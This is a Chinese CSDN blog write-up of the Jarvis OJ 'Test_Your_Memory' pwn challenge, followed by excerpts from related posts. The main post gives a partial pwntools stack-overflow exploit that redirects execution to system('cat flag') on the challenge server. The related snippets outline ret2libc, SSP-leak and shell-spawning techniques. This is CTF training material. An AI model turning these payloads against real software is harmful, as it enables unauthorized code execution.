Jarvis OJ-PWN

最新推荐文章于 2021-07-03 16:14:25 发布
最新推荐文章于 2021-07-03 16:14:25 发布
阅读量255 收藏
点赞数
分类专栏: Jarvis OJ CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45461609/article/details/107883004
版权
本文介绍了一道名为Test_Your_Memory的题目,该题目通过修改返回地址来执行`system()`函数,从而实现`cat flag`命令。在解决此问题时,涉及了栈溢出、__stack_chk_fail函数的理解以及ELF文件的重映射概念。通过确定栈溢出后的填充长度,可以利用程序崩溃时的输出获取flag内容。
摘要由CSDN通过智能技术生成

pwn

Test_Your_Memory

题目名字和题目没啥关系,真·一点关系也没有。

提供了system()函数
在这里插入图片描述
并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。
在这里插入图片描述
在这里插入图片描述
所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。

from pwn import *
r=remote('pwn2.jarvisoj.com',9876)
e=ELF('./memory')
sys_addr=e.symbols['system']
cat_flag_addr=e.search('cat flag').next()

payload='a'*(0x13+4)+p32(sys_addr)+p32(0x8048677)+p32(cat_flag_addr)
r.recvuntil('cff
最低0.47元/天 解锁文章
3nc0de
关注
专栏目录
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2427
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
Jarvis OJ pwn刷题
清霂的博客
03-26 252
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
jarvis oj pwn
qq_44813849的博客
07-24 226
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 324
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
Jarvis OJ-PWN-[XMAN]level1 wp
分不清东西南北的Laffey
09-26 1139
地址:nc pwn2.jarvisoj.com 9877 第一步:用checksec看开启了哪些保护 32位的 程序编译时关了栈不可执行保护 第二步:用IDA看伪代码 进去之后F5看到主函数 跟进vulnerable_function()函数 第三步:找到溢出点并加以分析 我们需要覆盖函数的返回地址 将其地址覆盖成shellcode的返回地址 这道题不像level0 里面有system函数...
Jarvis OJ--level3
Kni9hT's Blog
11-10 250
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ --Smashes (SSP leak攻击)
Kni9hT's Blog
11-03 772
1
Jarvis OJ --level4
Kni9hT's Blog
11-11 250
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1080
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
(Jarvis Oj)(Pwn) Guess
Nothing
06-17 616
(Jarvis Oj)(Pwn) Guess 查看保护。没开什么保护。 丢到ida中查看程序逻辑。前面不用看,找到handle函数。 可以看到输入是用fget函数处理的,限制了输入的长度,所以不好溢出。再看看flag_correct( )函数。 在nc连远程服务器的时候也提示说,要将flag先encode成hex,所以50个字符的flag就成了100个字符,程序首先判断长度是否...
JarvisOJ PWN level系列 wp
苗_的博客
02-09 434
菜菜的小白最近学习pwn,做了Jarvis上的一些题目进行练习,也从很多师傅的博客里学习到了很多新的知识,今天重新温习并且总结一下,以下的wp可能会比较详细,大佬可略: level0 这一题的难度还是蛮容易的,首先拖进ida里,发现有'/bin/sh/字符串和system函数,然后找溢出点,发现read函数这里发生溢出,只给了0x88的内存,但是却要读0x200个字节,必溢出: 然后构造...
jarvisoj pwn level系列
weixin_45551695的博客
05-26 216
某重新入坑的小白试图学会如何打pwn 从现在开始,个人计划也就开始了,希望能走下去吧, 先看看blibli这个基础的 CTF pwn 小白基础课 后面的UP主后面有,讲得浅显易懂 有基础有能力有时间的可以看看这个人 我不认识他但是货很干,很厉害,可以看看他的博客 然后 不多说,来搞事情 做题网站 level0 首先,下下来这个东东 拿到程序后先file可知为64位程序和动态链接 cheksec一下检查保护机制 我们能看到这个玩意,可以看到是一个只开启了NX的64位linux程序。 Stack:栈保护 R
[JarvisOJ][pwn]Guess
九层台
07-01 860
练习了一个oj平台上的题,感觉收货很多,在这里记下来。 liu@liu-F117-F:~/桌面/oj/猜测$ checksec 1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/\xe7\x8c\x9c\xe6\xb5\x8b/1' Arch: amd64-64-little RELRO: No RELRO Sta...
JarvisOJpwn)guess
苗_的博客
02-26 266
先看一下函数结构: main: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { struct sockaddr addr; // [rsp+0h] [rbp-20h] __pid_t v4; // [rsp+14h] [rbp-Ch] int v5; // [rsp+18h]...
JarvisOJ pwn Test Your Memory
苗_的博客
02-24 259
先找到几个关键函数: 单击main看一下函数结构: 点进mem_test看下: 找到溢出点:scanf 点进去hint发现了cat flag字符串..... (问题突然变得很简单....ret2libc) exp: from pwn import * #p = process('./memory') p = remote("pwn2.jarvisoj.com","9876") ...
Jarvis OJ-pwn test your memory
hanqdi_的博客
02-06 228
pwn test your memory 运行一下 检查保护机制 只开启堆栈不可执行保护。 观察反汇编代码,main函数里随机产生一串字符串,然后调用mem_test进行检测。 mem_test函数,先打印一个地址(hint),再输入s,这里存在栈溢出漏洞,然后输入的s与随机产生的字符串比较。 点进hint,提示是cat flag命令,可以获得flag 程序中已有system函数。 ...
[JarvisOJ][pwn]Test Your Memory
九层台
07-06 840
经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的 走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数,然后找漏洞吧 int __cdecl mem_test(char *s2) {...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值